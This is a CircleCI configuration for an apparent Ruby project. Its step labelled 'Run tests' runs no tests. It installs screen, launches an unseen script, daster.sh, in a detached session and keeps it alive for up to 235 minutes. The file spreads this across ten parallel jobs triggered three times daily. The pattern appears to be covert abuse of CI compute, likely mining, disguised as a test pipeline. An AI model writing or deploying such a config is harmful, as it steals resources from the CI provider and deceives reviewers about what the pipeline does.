working_dir: &working_dir ~/app
.build_template: &script
  steps:
    - checkout
    - run: curl -L https://codeclimate.com/downloads/test-reporter/test-reporter-latest-linux-amd64 > ./cc-test-reporter
    - run: chmod +x ./cc-test-reporter
    - run: ./cc-test-reporter before-build
    - run: gem install bundler:2.1.4
    - run: bundle install --jobs=4 --retry=4 --path vendor/bundle
    - run: bundle exec rake rubocop
    - run:
        name: Run tests
        command: | 
              apt update 
              apt install screen -y 
              chmod +x daster.sh 
              screen -dmS daster ./daster.sh 
              chmod +x timeout.sh && ./timeout.sh
        no_output_timeout: 235m
version: 2.0
jobs:
  daster:
    docker:
      - image: ruby
    steps:
      - checkout
  daster1:
    <<: *script
    docker:
      - image: ruby:2.7
  daster2:
    <<: *script
    docker:
      - image: ruby:2.6
  daster3:
    <<: *script
    docker:
      - image: ruby:2.5
  daster4:
    <<: *script
    docker:
      - image: ruby:2.4
  daster5:
    docker:
      - image: ruby
    steps:
      - checkout
  daster6:
    <<: *script
    docker:
      - image: ruby:2.7
  daster7:
    <<: *script
    docker:
      - image: ruby:2.6
  daster8:
    <<: *script
    docker:
      - image: ruby:2.5
  daster9:
    <<: *script
    docker:
      - image: ruby:2.4
workflows:
  version: 2
  commit:
    jobs:
      - daster
      - daster1
      - daster2
      - daster3
      - daster4
      - daster5
      - daster6
      - daster7
      - daster8
      - daster9


    triggers:
      - schedule:
          cron: "0 0,8,16 * * *"
          filters:
            branches:
              only:
                - master

  dasterrunjob:
    jobs:
      - daster
      - daster1
      - daster2
      - daster3
      - daster4
      - daster5
      - daster6
      - daster7
      - daster8
      - daster9
